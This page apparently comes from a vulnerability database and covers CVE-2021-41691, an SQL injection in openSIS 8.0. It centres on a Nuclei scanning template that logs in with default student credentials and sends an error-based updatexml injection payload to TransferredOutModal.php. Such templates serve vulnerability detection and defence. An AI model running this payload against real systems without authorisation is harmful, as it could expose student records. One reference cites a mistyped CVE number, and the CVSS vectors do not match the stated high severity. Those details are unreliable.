Lucene search

ProjectDiscoveryNUCLEI:CVE-2021-41691

HistoryMar 21, 2022 - 1:46 p.m.

openSIS Student Information System 8.0 SQL Injection

2022-03-2113:46:15

ProjectDiscovery

github.com

cve

cve2021

sqli

authentication

exploit-db

opensis

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

33.4%

JSON

openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.

id: CVE-2021-41691

info:
  name: openSIS Student Information System 8.0 SQL Injection
  author: Bartu Utku SARP
  severity: high
  description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691).
  reference:
    - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691
    - https://www.exploit-db.com/exploits/50637
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169
  classification:
    cve-id: CVE-2021-41691
  metadata:
    max-request: 2
  tags: cve,cve2021,sqli,auth,edb,opensis
variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME={{username}}&PASSWORD={{password}}&language=en&log=
      - |
        POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5

    attack: pitchfork
    payloads:
      username:
        - student
      password:
        - student@123
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "<!-- SQL STATEMENT:") && contains(body_2, "SELECT COUNT(STUDENT_ID)")'
          - 'status_code_2 == 200'
        condition: and
# digest: 490a00463044022020acc5b755d418a36f3a29fce32ed2eea9c02cd42d4b920c8b944c10f5b4437c0220163520ea8ce575f433de2a6f5dfb65a4dc22438ffc172d9a6be807c9b7336dcd:922c64590222798bb761d5b6d8e72950

References

cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169

securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691

www.exploit-db.com/exploits/50637

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.001

Percentile

33.4%

JSON

Related for NUCLEI:CVE-2021-41691